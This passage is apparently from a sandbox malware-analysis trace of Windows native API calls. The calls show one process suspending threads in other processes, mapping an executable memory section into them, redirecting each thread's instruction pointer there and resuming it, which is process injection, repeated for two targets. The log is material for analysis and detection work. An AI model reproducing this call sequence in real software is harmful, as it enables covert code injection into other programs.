(Handle=0x104) returned 0x0 [0195.779] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xa6c, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0195.779] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.779] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.779] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.780] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.784] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xa70) | out: ThreadHandle=0x19ea68*=0xbc) returned 0x0 [0195.784] NtSuspendThread (in: ThreadHandle=0xbc, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.784] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x1f60000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.791] NtGetContextThread (in: ThreadHandle=0xbc, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x1ff7a0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x1ff748, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x1ff72c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.791] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.792] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x169200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x16a000) returned 0x0 [0195.801] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x169200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x2930000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x16a000) returned 0x0 [0195.833] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.844] NtClose (Handle=0x10c) returned 0x0 [0195.844] NtSetContextThread (ThreadHandle=0xbc, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x1ff7a0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x1ff748, Eip=0x2a06707, SegCs=0x23, EFlags=0x246, Esp=0x1ff72c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.845] NtResumeThread (in: ThreadHandle=0xbc, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.845] NtClose (Handle=0x104) returned 0x0 [0195.845] NtClose (Handle=0xbc) returned 0x0 [0195.854] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xa74, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0xbc) returned 0x0 [0195.854] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.854] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.854] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.854] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.862] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xa78) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0195.862] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.862] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0xbc, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x20c0000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.869] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x40fda8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x40fd50, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x40fd34, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, 